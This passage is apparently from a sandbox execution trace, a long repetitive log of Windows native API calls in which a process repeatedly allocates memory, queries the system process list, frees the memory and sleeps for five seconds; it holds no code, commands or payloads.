returned 0x0 [0247.994] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.995] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.999] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.000] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.002] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.002] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.003] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.003] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.003] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.008] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.009] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.011] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.012] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.013] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.013] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.013] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.022] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.023] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.025] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.025] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.026] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.027] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.027] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.032] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.033] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.035] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.035] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.036] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.036] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.036] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.041] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.042] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.043] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.044] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.045] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.045] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.045] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.050] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.051] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.052] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.054] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.054] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.078] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.078] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.080] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.081] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.081] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.082] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.086] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.087] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.089] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.089] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.090] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.090] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.090] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.095] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.096] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.097] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.098] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.098] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.098] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.099] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.103] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.104] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.105] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.106] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.107] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.107] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.107] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.111] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.112] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.114] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.114] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.115] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.116] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.116] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.120] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.121] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.122] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.123] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.124] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.124] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.124] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.128] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.129] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.131] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.131] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.132] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.132] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.133] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.137] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.138] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.140] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.140] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.141] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.141] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.142] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.146] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.147] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.149] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.150] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.150] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.150] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.155] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.156] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.158] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.159] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.159] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.160] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.164] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.165] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.166] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.167] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.167] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.168] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.168] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.172] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.173] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.174] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.175] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.176] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.176] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.177] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.181] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.182] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.184] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.184] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.185] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.185] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.186] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.190] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.191] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.193] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.193] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.194] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.194] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.195] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.199] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.200] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.202] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, 